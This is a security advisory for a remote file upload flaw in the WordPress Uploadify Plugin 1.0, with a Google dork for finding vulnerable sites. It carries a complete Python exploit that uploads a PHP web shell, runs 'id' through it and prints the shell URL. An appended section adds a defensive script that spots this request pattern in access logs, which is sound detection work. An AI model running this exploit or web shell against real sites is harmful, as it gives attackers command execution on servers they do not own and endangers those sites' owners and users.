GotGeek Labs
http://www.gotgeek.com.br/
WordPress Uploadify Plugin 1.0 Remote File Upload
[+] Description
Adds a shortcode to embed the necessary elements to use
Uploadify in a page or post which will give your website
visitors the ability to upload large files. By default the
files will be uploaded to the folder set in your preferences.
The shortcode supports most of the Uploadify options, so it
can be easily customized to suit your needs.
[+] Information
Title: WordPress Uploadify Plugin 1.0 Remote File Upload
Google Dork: inurl:"/wp-content/plugins/uploadify/"
Advisory: gg-003-2011
Date: 02-18-2011
Last update: 02-21-2011
Link: http://www.gotgeek.com.br/pocs/gg-003-2011.txt
Tested on: CentOS 5.5 + WordPress 3.0.5
[+] Vulnerability
The Uploadify plugin ships includes/process_upload.php, an upload
handler that accepts a multipart/form-data request (field "Filedata")
from unauthenticated clients, takes the destination directory from the
"folder" query parameter and stores the file under the client-supplied
name and extension. An attacker can therefore upload PHP code into the
web root, for example next to the handler itself with folder=./, and
run it in the context of the webserver process. This may facilitate
unauthorized access or privilege escalation.
Affected Versions:
WordPress Uploadify Plugin 1.0
[+] Proof of Concept/Exploit
#!/usr/bin/env python3
#
# Unauthenticated file upload in WordPress Uploadify Plugin 1.0:
# POST a PHP file to includes/process_upload.php with folder=./ so it
# lands inside the plugin's includes/ directory, then run `id` through it.
import http.client
import socket
import sys

plugin = "/wp-content/plugins/uploadify/includes/"
shell = """
<?php system($_GET['cmd']); ?>
"""


def banner():
    print("\n[*] gotgeek labs")
    print("[*] http://gotgeek.com.br\n")


if len(sys.argv) < 4:
    banner()
    print("[?] Usage: " + sys.argv[0] + " <target> <dir> <port>")
    print("[?] Example: uploadify.py www.example.com /wordpress 80\n\n")
    sys.exit(1)

target = sys.argv[1]
wpdir = sys.argv[2]
port = sys.argv[3]


def checkurl():
    # The handler answers 200 to a plain GET when it is present.
    try:
        print("[*] Looking for vulnerable file...")
        conn = http.client.HTTPConnection(target + ":" + port)
        conn.request("GET", wpdir + plugin + "process_upload.php")
        r1 = conn.getresponse()
        if r1.status == 200:
            print("[+] Found!\n")
        else:
            print("[-] NOT Found!\n\n")
            sys.exit(1)
    except socket.error:
        print("[-] Can't connect!\n\n")
        sys.exit(1)


def uploadshell():
    # Hand-built multipart/form-data body. "Filedata" is the field the
    # handler reads, the filename keeps its .php extension, and folder=./
    # makes the handler store the file next to itself in includes/.
    # Each body boundary line is "--" plus the boundary named in the header.
    print("[*] Uploading shell...")
    params = ("\r\n"
              "------gg\r\n"
              'Content-Disposition: form-data; name="Filedata"; '
              'filename="shell.php"\r\n'
              "Content-Type: application/octet-stream\r\n"
              "\r\n")
    params += shell + "\r\n"
    params += ("------gg--\r\n"
               "\r\n")
    headers = {'User-Agent': 'gotgeek',
               'Content-Type': 'multipart/form-data; boundary=----gg'}
    conn = http.client.HTTPConnection(target + ":" + port)
    conn.request("POST", wpdir + plugin +
                 "process_upload.php?folder=./", params, headers)
    conn.getresponse().read()   # wait for the handler to finish
    conn.close()


def checkshell():
    print("[*] Checking shell.php...")
    conn = http.client.HTTPConnection(target + ":" + port)
    conn.request("GET", wpdir + plugin + "shell.php")
    r2 = conn.getresponse()
    r2.read()   # drain the body before reusing the connection
    if r2.status == 200:
        print("[+] Shell Uploaded!\n")
        conn.request("GET", wpdir + plugin + "shell.php?cmd=id")
        r3 = conn.getresponse()
        out = r3.read().decode("utf-8", "replace")
        print("[+] id: " + out)
        print("[+] shell: http://" + target + wpdir + plugin +
              "shell.php?cmd=[command]\n\n")
        conn.close()
    else:
        print("[-] NOT Uploaded!\n\n")
        sys.exit(1)


def main():
    banner()
    checkurl()
    uploadshell()
    checkshell()


if __name__ == "__main__":
    main()
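As an added example, not part of the original advisory and not the plugin's or the author's code, the script below runs a detection over web-server access logs in Apache "combined" format and flags the request sequence the PoC above produces: a POST to includes/process_upload.php (in particular one carrying the folder= query, which a browser upload driven by the plugin's own settings does not send), followed by a 200 for some other .php file under includes/ from the same client. The log lines are constructed for the example; the PoC's "gotgeek" User-Agent is deliberately not relied on, since it is trivial to change.

```python
import re
from collections import defaultdict

# Constructed sample lines (Apache combined format); not real traffic.
# Client 203.0.113.5 replays the PoC; 198.51.100.7 is a normal plugin upload.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Feb/2011:10:01:02 +0000] "GET /wordpress/wp-content/plugins/uploadify/includes/process_upload.php HTTP/1.1" 200 0 "-" "gotgeek"
203.0.113.5 - - [18/Feb/2011:10:01:03 +0000] "POST /wordpress/wp-content/plugins/uploadify/includes/process_upload.php?folder=./ HTTP/1.1" 200 12 "-" "gotgeek"
203.0.113.5 - - [18/Feb/2011:10:01:06 +0000] "GET /wordpress/wp-content/plugins/uploadify/includes/shell.php HTTP/1.1" 200 0 "-" "gotgeek"
203.0.113.5 - - [18/Feb/2011:10:01:06 +0000] "GET /wordpress/wp-content/plugins/uploadify/includes/shell.php?cmd=id HTTP/1.1" 200 54 "-" "gotgeek"
198.51.100.7 - - [18/Feb/2011:10:05:00 +0000] "GET /wordpress/wp-content/plugins/uploadify/uploadify.css HTTP/1.1" 200 1390 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Feb/2011:10:05:01 +0000] "POST /wordpress/wp-content/plugins/uploadify/includes/process_upload.php HTTP/1.1" 200 12 "http://www.example.com/wordpress/upload/" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

HANDLER = "/wp-content/plugins/uploadify/includes/process_upload.php"
INCLUDES = "/wp-content/plugins/uploadify/includes/"


def parse(line):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(rec):
    """Tag one request, or return None if it is not interesting."""
    path, _, query = rec["url"].partition("?")
    if path.endswith(HANDLER) and rec["method"] == "POST":
        # The PoC steers the destination with folder=; a browser upload
        # configured by the plugin leaves the folder to the site settings.
        return "upload-with-folder" if "folder=" in query else "upload"
    idx = path.find(INCLUDES)
    if idx != -1:
        name = path[idx + len(INCLUDES):]
        # Any PHP file in includes/ other than the handler is foreign.
        if name.endswith(".php") and name != "process_upload.php":
            return "php-under-includes"
    return None


def analyze(log_text):
    """Group tagged requests by client and return {ip: verdict} for clients
    that uploaded and then hit a foreign PHP file (web shell dropped), or
    that only used the attacker-style folder= upload (suspicious)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        tag = classify(rec)
        if tag:
            events[rec["ip"]].append((tag, rec["url"], rec["status"]))
    findings = {}
    for ip, evs in events.items():
        tags = {t for t, _, _ in evs}
        uploaded = "upload-with-folder" in tags or "upload" in tags
        executed = any(t == "php-under-includes" and s == "200"
                       for t, _, s in evs)
        if uploaded and executed:
            findings[ip] = "webshell-dropped"
        elif "upload-with-folder" in tags:
            findings[ip] = "suspicious-upload"
    return findings


if __name__ == "__main__":
    for ip, verdict in analyze(SAMPLE_LOG).items():
        print(ip, verdict)
```

The correlation is keyed on client IP and on the 200 for the foreign PHP file, so a failed upload (handler returns 200 but nothing lands) or a scanner that only GETs process_upload.php produces no finding; on a real log, run analyze() over the file contents and treat "webshell-dropped" as an incident and "suspicious-upload" as a lead to confirm by listing .php files under includes/.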
[+] References
http://wordpress.org/extend/plugins/uploadify/
http://wordpress.org/extend/plugins/uploadify/stats/
[+] Credits
b0telh0